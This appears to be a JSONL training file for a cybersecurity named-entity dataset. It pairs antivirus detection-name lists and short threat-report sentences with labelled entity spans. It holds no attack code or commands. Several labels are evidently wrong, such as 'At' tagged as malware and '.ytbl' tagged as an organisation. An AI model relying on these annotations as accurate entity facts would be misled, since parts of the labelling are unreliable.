{"text": "A backdoor also known as: Flooder.Napsterokoz!ZeoO3ZzZXAQ PUA.Win32.Packer.NetExecutable-1 Flooder.Win32.Napsterokoz.a Trojan.DownLoader5.2173 Trojan-PWS.Win32.Fignotok!IK Flooder.Napsterokoz.a Flooder.Napsterokoz.a Trojan-PWS.Win32.Fignotok Flooder.IJJ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006439", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mdropper TROJ_MDROPPR.CA Win32.Mdropper TROJ_MDROPPR.CA Trojan.Mdropper", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006440", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HackerAu3.Worm Win32.Worm.Autoit.Q Backdoor.Win32.Shark.axz!O Worm.Autoit.i Win32.Worm.Autoit.Q Worm.AutoIt.Win32.2 W32/AutoRun.fjx WORM_UTOTI.RC Win32.Worm.Sohanad.br W32/Downloader.AEEC-3989 W32.SillyDC Win32/Vishawon.A WORM_UTOTI.RC Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan.Script.AutoIt.delira Worm.Win32.Autorun.215552.B Win32.Virus.Alman.Svhc Win32.Worm.Autoit.Q Worm.Win32.AutoIt.~MT Win32.HLLW.Autoruner.1483 W32/Downldr2.AICJ Worm/AutoRun.jsl W32/Almanahe.C Win32.Worm.Autoit.Q W32.W.AutoRun.lbrr Worm.Win32.AutoIt.i Win32.Worm.Autoit.Q Trojan/Win32.AutoRun.C97057 Worm.AutoRun.FLD I-Worm.Autoit.AC Win32/Autoit.BA Worm.AutoIT.V Worm.Win32.AutoIt W32/AutoIt.I!worm Win32/Worm.c3b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006442", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeuserinitQC.Trojan TrojanDownloader.Paglst.B4 Trojan.Ursu.D206A Backdoor.Graybird Win32/Adload.NOU Win.Trojan.Adload-2949 Trojan-Downloader.Win32.Adload.cfms Trojan.Win32.Adload.rhwua Trojan.Win32.A.Downloader.6381568 Adware.Win32.AdLoader.a TrojWare.Win32.Downloader.AdLoad.CFMS Trojan.DownLoad2.64118 Downloader.Adload.Win32.13800 TrojanDownloader.Adload.oqx TR/Adload.V Trojan[Downloader]/Win32.Adload.cfms TrojanDownloader:Win32/Paglst.B Troj.Downloader.W32.Adload.toiw Trojan-Downloader.Win32.Adload.cfms Downloader/Win32.Adload.R32544 TScope.Malware-Cryptor.SB Win32/TrojanDownloader.Adload.NJM Trojan-Downloader.Win32.Adload W32/Adload.CFMS!tr.dldr Trojan.PSW.Win32.QQPass.DT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006444", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod6d6.Trojan.587c Trojan.Downloader.JMWD Trojan.Downloader.JMWD Trojan.Boupke.A6 Trojan.Downloader.JMWD Trojan.Win32.S.Downloader.196096.A Trojan.Downloader.JMWD Trojan.Downloader.JMWD DDoS.5686 Trojan:Win32/Doschald.A Trojan.Downloader.JMWD Trj/Downloader.MDW Trojan.Win32.Downloader.au Win32/Trojan.Downloader.001", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006445", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Letbetom.Trojan Trojan-Spy.MSIL.Redator!O Trojan/Redator.a Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/MalwareF.LRAK Win.Trojan.Keylogger-796 Trojan-Spy.MSIL.Redator.a Trojan.Win32.Redator.cwfoqm Trojan.Win32.Z.Redator.186456 Backdoor.PePatch.Win32.36732 W32/Risk.TYVS-3062 TrojanSpy.MSIL.dwl System.Monitor.Stealthddos Trojan[Spy]/MSIL.Redator Trojan.MSIL.Krypt.2 Troj.Spy.MSIL.KeyLogger.ljvI Trojan-Spy.MSIL.Redator.a Trojan/Win32.Keylogger.R4155 TrojanSpy.MSIL.Redator Trj/CI.A MSIL/Spy.Keylogger.AK Msil.Trojan-spy.Redator.Pgcw W32/Mdrop.CRV!tr Win32/Trojan.Spy.17f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006448", "source": "cyner2_train"}}
{"text": "It is this second webshell that enabled the threat actor to run a variety of commands on the compromised server.", "spans": {"MALWARE: webshell": [[18, 26]], "THREAT_ACTOR: the threat actor": [[40, 56]], "SYSTEM: the compromised server.": [[89, 112]]}, "info": {"id": "cyner2_train_006450", "source": "cyner2_train"}}
{"text": "Not long ago, news appeared online of a younger sibling for the sensational vulnerability EternalBlue.", "spans": {"MALWARE: younger sibling": [[40, 55]], "VULNERABILITY: sensational vulnerability": [[64, 89]], "MALWARE: EternalBlue.": [[90, 102]]}, "info": {"id": "cyner2_train_006453", "source": "cyner2_train"}}
{"text": "At the time of writing this article, the Joao downloader was being distributed via the anime-themed MMORPG Grand Fantasia offered on gf.ignitgames[.]to.", "spans": {"MALWARE: At": [[0, 2]], "MALWARE: the Joao downloader": [[37, 56]]}, "info": {"id": "cyner2_train_006454", "source": "cyner2_train"}}
{"text": "DDoS tools developed by this organization use SSH weak passwords and server vulnerabilities to control many Linux chickens.", "spans": {"MALWARE: DDoS tools": [[0, 10]], "THREAT_ACTOR: organization": [[29, 41]], "SYSTEM: Linux": [[108, 113]]}, "info": {"id": "cyner2_train_006455", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9848 BehavesLike.Win64.BadFile.lm Backdoor:Win64/Syscon.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006457", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Flooder.ICQ.Raptof.01 Trojan/W32.Flooder.223744 Flooder.Raptof.ra Trojan.Flooder.ICQ.Raptof.01 IM-Flooder.W32.Raptof.01!c Trojan.Flooder.ICQ.Raptof.01 Flooder.Raptof!8im4oqjQSco Hacktool.Flooder Win32/Flooder.ICQ.Raptof.01 Win.Trojan.Raptof IM-Flooder.Win32.Raptof.01 Trojan.Win32.Raptof.dlvc Spyware.IM-Flooder.Raptof.223744[h] Trojan.Flooder.ICQ.Raptof.01 TrojWare.Win32.Flooder.ICQ.01 Trojan.Flooder.ICQ.Raptof.01 FDOS.Raptof Tool.Raptof.Win32.1 BehavesLike.Win32.Malware.dc W32/Risk.YFGX-8652 Flooder.ICQ.Raptof.01 HackTool[Flooder]/Win32.Raptof Win-Trojan/Raptof.223744 Trojan.Flooder.ICQ.Raptof.01 IMFlooder.Raptof Win32.Trojan.Raptof.Eflc Malware_fam.gw Flooder.BBR Trojan.Win32.ICQ.Raptof Win32/Trojan.Flood.be5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006458", "source": "cyner2_train"}}
{"text": "This suggests that multiple actors may be using similar source code, or the malware is being customized as a service for targeted campaigns.", "spans": {"THREAT_ACTOR: multiple actors": [[19, 34]], "MALWARE: malware": [[76, 83]], "MALWARE: targeted campaigns.": [[121, 140]]}, "info": {"id": "cyner2_train_006459", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.QuastihusLTG.Trojan Worm.Jenxcus.A4 Trojan/Autoit.jh Trojan.Heur.AutoIT.10 W32/Trojan2.OIEK Win.Trojan.Autoit-581 W32.Sality.mCD7 Worm.AutoIT.Win32 BehavesLike.Win32.Dropper.jh W32/Trojan.WAFR-6845 TrojanDropper.Sysn.fg Trojan:AutoIt/Nateqj.B Trojan/Win32.Zapchast.R114120 Worm.AutoIt Trj/CI.A I-Worm.Autoit.JH Win32/Autoit.JH Win32.Worm.Autoit.Wofs Win32/Trojan.5a2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006460", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Keylogger.2292572 RiskWare.WinActivator MSIL.Riskware.Hacktool.B Tool.Wpakill.13 Trojan.Keylogger.Win32.50652 HackTool.Win32.Wpakill W32.Hack.Tool Trojan[Spy]/MSIL.Keylogger HackTool/Win32.Wpakill.C2293432 TrojanSpy.MSIL.Keylogger TrojanSpy.Keylogger!axHWqO6gDEY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006461", "source": "cyner2_train"}}
{"text": "The attackers invested significant effort in attempting to hide the tool by changing the source code of the RAT and the RAT server, and by using an obfuscator and packer.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: tool": [[68, 72]], "MALWARE: RAT": [[108, 111], [120, 123]], "SYSTEM: server,": [[124, 131]], "SYSTEM: an obfuscator": [[145, 158]], "SYSTEM: packer.": [[163, 170]]}, "info": {"id": "cyner2_train_006462", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Cloddf4.Trojan.f747 Win32.Worm.P2p.Reur.P I-Worm.Reur.l.n2 W32/Reur.worm!p2p Worm.Reur.Win32.19 W32/Reur.p Worm.P2P.Reur!QrOO3e6Ele8 W32/Reur.YOAP-3596 W32.HLLW.Reur Win32/Reur.J P2P-Worm.Win32.Reur.p Win32.Worm.P2p.Reur.P Trojan.Win32.Reur.inko Win32.Worm.P2p.Reur.P Worm.Win32.Reur.S Win32.Worm.P2p.Reur.P BehavesLike.Win32.Dropper.gc W32/Reur.K Worm/Sramota.afo Worm[P2P]/Win32.Reur Worm.Reur.p.kcloud Worm:Win32/Reur.S Win32.Worm.P2p.Reur.P Trojan/Win32.HDC Worm.Reur Win32/Reur.S W32/Reur.K!worm.p2p Worm/Reur.V Worm.Win32.Reur.alHx Win32/Worm.226", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006464", "source": "cyner2_train"}}
{"text": "Its main job is to send spam, but it is able to do other tasks as well.", "spans": {}, "info": {"id": "cyner2_train_006467", "source": "cyner2_train"}}
{"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept POC code to install a Trojan called Emissary, which is related to the Operation Lotus Blossom campaign.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: exploit": [[24, 31]], "MALWARE: proof-of-concept POC code": [[87, 112]], "MALWARE: Trojan": [[126, 132]], "MALWARE: Emissary,": [[140, 149]], "THREAT_ACTOR: Operation Lotus Blossom": [[174, 197]]}, "info": {"id": "cyner2_train_006468", "source": "cyner2_train"}}
{"text": "A combination of factors made this pattern effective and successful, explaining why ITG08 has remained operational for so long.", "spans": {"THREAT_ACTOR: ITG08": [[84, 89]]}, "info": {"id": "cyner2_train_006472", "source": "cyner2_train"}}
{"text": "Ploutus is one of the most advanced ATM malware families we've seen in the last few years.", "spans": {"MALWARE: Ploutus": [[0, 7]], "MALWARE: advanced ATM malware families": [[27, 56]]}, "info": {"id": "cyner2_train_006475", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector Win/HLLP.Sector.C NE_HLLP_SECTOR.C Win.HLLP.Sector.C Win.HLLP.Sector.C Trojan.Win16.HLLP.exkzou Win.Hllp.Sector!c Win.HLLP.Sector.C Win.HLLP.Sector.C Win.HLLP.Sector.18864 NE_HLLP_SECTOR.C W16/TNT.a W16/HLLP.Sector.C Backdoor:Win16/Sector.C W16/TNT.a Win32.Virus.Hllp.Akes Virus.Win.Hllp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006476", "source": "cyner2_train"}}
{"text": "Per its advertisements it is an infostealer that steals form data from various web browsers and other applications.", "spans": {"MALWARE: infostealer": [[32, 43]]}, "info": {"id": "cyner2_train_006477", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WS.Reputation.1 WORM_DUPTWU.SMIA Worm.Autorun-6650 Backdoor.Win32.LolBot.dyk Trojan.Downloader.JNUS Backdoor.Win32.LolBot!IK Trojan.Downloader.JNUS WORM_DUPTWU.SMIA Worm:Win32/Duptwux.A Trojan.Downloader.JNUS Backdoor/Win32.LolBot Backdoor.LolBot.ju Worm.Win32.FakeFolder.t Backdoor.Win32.LolBot W32/LolBot.DYK!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006479", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Scarpnex-1 Trojan.MulDrop4.61017 Trojan[Spy]/MSIL.KeyLogger Trojan:MSIL/Scarpnex.A Trojan.Zusy.D9B94 TrojanSpy.KeyLogger!icGvcsfSy6M Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006480", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Msxrat Trojan.Win32.Z.Msxrat.522564 TR/Crypt.Xpack.wccie Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006481", "source": "cyner2_train"}}
{"text": "The LOCKBIT ransomware group is one of the most notorious cyber-thieves in the world, targeting companies across Europe, the United States, India, and the Middle East in a series of attacks that began in December 2022.", "spans": {"THREAT_ACTOR: The LOCKBIT ransomware group": [[0, 28]], "THREAT_ACTOR: cyber-thieves": [[58, 71]], "ORGANIZATION: companies": [[96, 105]]}, "info": {"id": "cyner2_train_006482", "source": "cyner2_train"}}
{"text": "It is unknown what is the intent behind the campaign as of this writing, however, the profile of the targets resembles those that are common targets of Advanced Persistent Threat APT actors.", "spans": {"THREAT_ACTOR: the campaign": [[40, 52]], "THREAT_ACTOR: Advanced Persistent Threat APT actors.": [[152, 190]]}, "info": {"id": "cyner2_train_006483", "source": "cyner2_train"}}
{"text": "We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks.", "spans": {"THREAT_ACTOR: campaign": [[44, 52]], "ORGANIZATION: Korean banks.": [[98, 111]]}, "info": {"id": "cyner2_train_006484", "source": "cyner2_train"}}
{"text": "The latest Petya-like outbreak has gathered a lot of attention from the media.", "spans": {}, "info": {"id": "cyner2_train_006486", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Gimemo!O Trojan.PornoAsset.Win32.9310 Trojan/Gimemo.aunq Trojan.Symmi.D1B0C Trojan.Winlock.7482 BehavesLike.Win32.BadFile.ch Trojan/PornoAsset.ooo Trojan[Ransom]/Win32.Gimemo Trojan:Win32/Fsblock.A TScope.Trojan.VB Trojan-Dropper.Win32.Injector W32/Injector.CLTY!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006489", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9520 Win32.Trojan.Razy.Hsjc BehavesLike.Win32.BadFile.mz TR/Razy.anyu Trojan:Win32/Rekilc.C Trojan.Razy.D822B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006490", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Degrub Trojan-Spy.Win32.Delf.avce Trojan.Win32.Symmi.daxrzp Trojan.Win32.Z.Delf.731648 Troj.Spy.W32.Delf!c Trojan.Delf.Win32.64416 BehavesLike.Win32.Dropper.bh Trojan-Spy.Win32.Delf TrojanSpy.Delf.iwz TR/Spy.Delf.agiu Backdoor:Win32/Degrub.A Trojan-Spy.Win32.Delf.avce TScope.Trojan.Delf Trj/Chgt.A Win32.Trojan-spy.Delf.Akpg TrojanSpy.Delf!bLkOUU0IMLc W32/Delf.AFB!tr Win32/Trojan.Keylog.e29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006491", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan.Win32.Mlw.ewygwi Backdoor.W32.Androm.mfVY Trojan.Injector.Win32.586108 TR/Dropper.MSIL.xejse Trojan.MSIL.Inject Trj/GdSda.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006492", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.401 Vb.Troj.Valyria!c Trojan.GQXF-6 VB:Trojan.Valyria.401 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.401 VB:Trojan.Valyria.401 HEUR_VBA.E HEUR.VBA.Trojan.d TrojanDropper:O97M/SilverMob.A!dha VB:Trojan.Valyria.401 Macro.Trojan.Dropperd.Auto Trojan.VB.Valyria VB:Trojan.Valyria.401 virus.office.obfuscated.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006493", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.GameThief.W32.Magania.lhJV Win32.Trojan-PSW.OLGames.ck TSPY_ONLINEG.VBY Win.Spyware.18411-2 Trojan-GameThief.Win32.OnLineGames.hmv Trojan.Win32.OnLineGames.bjsgmk TrojWare.Win32.Magania.~I Trojan.PWS.Wsgame.4325 TSPY_ONLINEG.VBY Trojan-GameThief.Win32.OnLineGames TR/CrashSystem.C Trojan[GameThief]/Win32.OnLineGames Win32.Troj.OnLimeGamesT.gs.73779 Trojan-GameThief.Win32.OnLineGames.hmv Trojan/Win32.OnlineGameHack.R96963 Trojan.Graftor.Elzob.D370C Trojan.PWS.OnLineGames!SkDSyFiZd8U", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006494", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ProxyChanger Trojan.Banload Trojan/ProxyChanger.ik TROJ_BANLOAD.HVU W32/Trojan2.NXCH Win32/Tnega.ASRL Trojan.ProxyChanger.IK TROJ_BANLOAD.HVU Win.Trojan.Dealply-6391261-0 Trojan.DownLoad3.29408 BehavesLike.Win32.Dropper.gh W32/Trojan.YDHZ-1016 TR/ProxyChanger.H.1 Trojan/Win32.Unknown Trojan:Win32/ProxyChanger.H Trojan/Win32.ChePro.R102488 TScope.Trojan.Delf Win32/ProxyChanger.IK Trojan.ProxyChanger!NBBwWIBks/E Trojan.Crypt W32/Banloa.NX!tr Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006496", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Gaobot.iawc W32/Joke.OA Joke.Rosenu TROJ_SPNR.03D111 Backdoor.Pasur!NYY0BVh8dz8 TrojWare.Win32.Trojan.Chifrax.~A TROJ_SPNR.03D111 W32/Joke.ERJK-0662 Joke.Rosenu Win32/Joke.ScreenRoses Trojan.Win32.Inject Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006498", "source": "cyner2_train"}}
{"text": "A family of ransomware Trojans that encrypts files and adds the extensions .xtbl and .ytbl emerged in late 2014/early 2015, and quickly established itself among the top three most widespread encryptors in Russia along with Trojan-Ransom.Win32.Cryakl and Trojan-Ransom.BAT.Scatter.", "spans": {"MALWARE: ransomware Trojans": [[12, 30]], "ORGANIZATION: .ytbl": [[85, 90]], "MALWARE: encryptors": [[191, 201]]}, "info": {"id": "cyner2_train_006499", "source": "cyner2_train"}}
{"text": "Morphick is tracking this malware under the name ScanPOS due to the build string present in the malware.", "spans": {"ORGANIZATION: Morphick": [[0, 8]], "MALWARE: malware": [[26, 33]], "MALWARE: ScanPOS": [[49, 56]], "MALWARE: malware.": [[96, 104]]}, "info": {"id": "cyner2_train_006502", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9673 Trojan.PWS.Zhui BehavesLike.Win32.VTFlooder.mh Win32.Troj.Wow.q.kcloud Trj/QQFile.D Win32.Trojan-qqpass.Qqrob.Akon Trojan.SystemHijack!vG9DZPEgkqo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006504", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojandownloader.Halnine Trojan.Zusy.D2FDB Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.DlrSysWrtbased!M.bdazop Trojan.Win32.Z.Zusy.15872.DI TrojanDownloader:Win32/Halnine.A Win32.Trojan.Spy.Swve", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006506", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win64.Fake.jh Trojan.Win32.Crypt Trojan.PSW.Mimikatz.un TR/AD.Trier.sqhjh Joke:VBS/Trier.A Trj/CI.A VBS/BadJoke.AL Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006507", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.FakeAV.NRC Trojan.Bampeass.B5 Trojan.FakeAV.NRC TROJ64_BAMPEASS.SM Win.Trojan.Fakeav-103064 Trojan.FakeAV.NRC Trojan.Win32.Wakme.c Trojan.FakeAV.NRC Variant.Kazy.mAdQ Trojan.FakeAV.NRC Trojan.FakeAV.Win32.316028 TROJ64_BAMPEASS.SM W64/Trojan.CZHS-5421 Trojan.Fakeav.bg TR/Bampeass.abd Trojan.FakeAV.NRC PUP.BrowseFox/Variant Trojan.Win32.Wakme.c Trojan:Win64/Bampeass.C Trojan.FakeAV.NRC Trj/CI.A Win32.Trojan.Wakme.Akew Win32/Trojan.d9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006510", "source": "cyner2_train"}}
{"text": "Forcepoint Security Labs™ recently investigated a trojanized RTF document which we tied to the Carbank criminal gang.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[0, 25]], "MALWARE: trojanized": [[50, 60]], "THREAT_ACTOR: the Carbank criminal gang.": [[91, 117]]}, "info": {"id": "cyner2_train_006511", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader:PowerShell/Hipolel.A Trojan.Win32.Swrort Win32/Trojan.Downloader.c1c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006512", "source": "cyner2_train"}}
{"text": "Doc with Macro that downloads Dridex", "spans": {"MALWARE: Dridex": [[30, 36]]}, "info": {"id": "cyner2_train_006513", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Small.8704.HT TrojanDownloader.Tooki Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win32/Tydpec.A TROJ_DLOADER.OXH Win.Downloader.16819-1 Trojan-Spy.Win32.KeyLogger.aszl Trojan.DownLoader8.62321 TROJ_DLOADER.OXH TrojanDownloader:Win32/Tooki.A Trojan-Spy.Win32.KeyLogger.aszl Win32.Trojan-spy.Keylogger.Lpbj", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006515", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.16896.DU Trojan-Spy.Win32.Zbot!O Backdoor.Small.D10 Trojan.Spy.Zbot W32.Spacefam Win32/Zbot.EUI TSPY_FIFESOCK_BK082A3D.TOMC Win.Trojan.Zbot-13661 Trojan.Win32.Zbot.curnd Trojan.Win32.A.Zbot.16896 Trojan.Proxy.18997 TSPY_FIFESOCK_BK082A3D.TOMC TrojanSpy.Zbot.awmw TR/Spy.ZBot.axcq.3 Trojan[Spy]/Win32.Zbot Trojan.Razy.D7DC8 Backdoor.W32.IRCBot.liBA Spyware/Win32.Zbot.R2503 SScope.Trojan.Zbot.01428", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006518", "source": "cyner2_train"}}
{"text": "Using DGA Domain Generation Algorithm to find the C C Command and Control server", "spans": {"SYSTEM: DGA Domain Generation Algorithm": [[6, 37]]}, "info": {"id": "cyner2_train_006520", "source": "cyner2_train"}}
{"text": "We discovered a new variant of a Brazilian-made ransomware, Trojan-Ransom.Win32.Xpan, that is being used to infect local companies and hospitals, directly affecting innocent people, encrypting their files using the extension .___xratteamLucked and asking to pay the ransom.", "spans": {"MALWARE: Brazilian-made ransomware,": [[33, 59]], "ORGANIZATION: local companies": [[115, 130]], "ORGANIZATION: hospitals,": [[135, 145]]}, "info": {"id": "cyner2_train_006521", "source": "cyner2_train"}}
{"text": "These investigations took place during mid-to-late 2017, and each bank compromise resulted in a significant amount of stolen funds.", "spans": {"ORGANIZATION: bank": [[66, 70]]}, "info": {"id": "cyner2_train_006522", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Molock Win32.Trojan.WisdomEyes.16070401.9500.9974 TR/Molock.nylne Trojan.Mikey.DD047 PUA.BlackMoon Win32/Trojan.2ce", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006523", "source": "cyner2_train"}}
{"text": "In March 2016, Symantec published a blog on Suckfly, an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates.", "spans": {"ORGANIZATION: Symantec": [[15, 23]], "THREAT_ACTOR: Suckfly,": [[44, 52]], "THREAT_ACTOR: advanced cyberespionage group": [[56, 85]], "ORGANIZATION: organizations": [[142, 155]]}, "info": {"id": "cyner2_train_006524", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.RansomCryakl.Trojan Trojan.Cryakl Trojan.Ransom.Cryakl Ransom_CRYPICH.SMA Win32.Trojan.WisdomEyes.16070401.9500.9790 W32/Trojan.GTXF-0130 Ransom_CRYPICH.SMA Trojan-Ransom.Win32.Cryakl.sw Trojan.Win32.Cryakl.drogeo Trojan.Win32.Z.Filecoder.626656 Win32.Trojan.Cryakl.Ahys Trojan.Encoder.1041 Trojan.Cryakl.Win32.53 Trojan-PWS.Win32.Delf Trojan/Cryakl.ap W32.Cryakl TR/FileCoder.bikix Trojan[Ransom]/Win32.Cryakl Trojan-Ransom.Win32.Cryakl.sw Trojan/Win32.Xema.C2455 Trojan-Ransom.Cryakl Ransom.TeslaCrypt.OL Trojan.Cryakl! W32/Filecoder.EQ!tr Win32/Trojan.c28", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006525", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropped:Backdoor.Rootodor.H Backdoor.W32.SdBot.aop!c Backdoor/SdBot.aop Backdoor.Rootodor.H Backdoor.Sdbot Win.Trojan.SdBot-8443 Dropped:Backdoor.Rootodor.H Backdoor.Win32.SdBot.aop Dropped:Backdoor.Rootodor.H Trojan.Win32.SdBot.fptq Dropped:Backdoor.Rootodor.H Dropped:Backdoor.Rootodor.H BackDoor.Rtkit.12 Backdoor.SDBot BehavesLike.Win32.Downloader.dc Backdoor/SdBot.cr WORM/SdBot.298496.1 Win32.Hack.SdBot.kcloud TrojanDropper:Win32/Srvdrop.A Backdoor.Win32.SdBot.aop Dropped:Backdoor.Rootodor.H Backdoor.SDBot Backdoor.SdBot Win32.Backdoor.Sdbot.Wrgb Worm.SdBot!0ktHNidYgyk Backdoor.Win32.SdBot W32/SDBot.AOP!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006527", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Pua.Cpush W32/Trojan.VJJX-8459 not-a-virus:AdWare.Win32.Cpush.a Adware.Cpush.Win32.21 BehavesLike.Win32.Downloader.fc Trojan.Zusy.D2AB1B not-a-virus:AdWare.Win32.Cpush.a AdWare.Cpush Trj/CI.A Win32/VB.NYC Win32.Adware.Cpush.Dwjc Adware.Cpush!ybdhrKQu3UY Trojan-Dropper.Win32.VB W32/VB.NYC!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006528", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NSIS.Androm.7 Ransom.Onion.A Win32.Trojan.WisdomEyes.16070401.9500.9984 Packed.NSISPacker!g6 Ransom_.97182692 Trojan.NSIS.Androm.7 Trojan.Win32.Graftor.evkohe Trojan:W32/Gamarue.E Trojan.Inject2.64079 Ransom_.97182692 BehavesLike.Win32.Ransom.cc Trojan.Win32.Injector W32/Trojan.HJUO-7930 Trojan.Graftor.D6B214 Ransom.Cerber/Variant Ransom:Win32/Malasypt.A Trojan/Win32.Miuref.R183155 Trj/CI.A Trojan.Injector!s1rN7kKLdpI W32/Injector.DDGJ!tr Win32/Trojan.5c1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006529", "source": "cyner2_train"}}
{"text": "Vectra Threat Labs researchers have uncovered the activities of a group of individuals currently engaged in targeted attacks against entities in the Middle East.", "spans": {"ORGANIZATION: Vectra Threat Labs researchers": [[0, 30]], "THREAT_ACTOR: group of individuals": [[66, 86]]}, "info": {"id": "cyner2_train_006533", "source": "cyner2_train"}}
{"text": "These websites, and the hosted programs, were designed to entice visitors to download and install the programs.", "spans": {}, "info": {"id": "cyner2_train_006534", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.DownLoader23.44275 Trojan.Graftor.D69D4B Trojan:Win32/Seepeed.A Trj/CI.A Win32.Trojan.Atraps.Pgmx W32/Kryptik.DNGA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006536", "source": "cyner2_train"}}
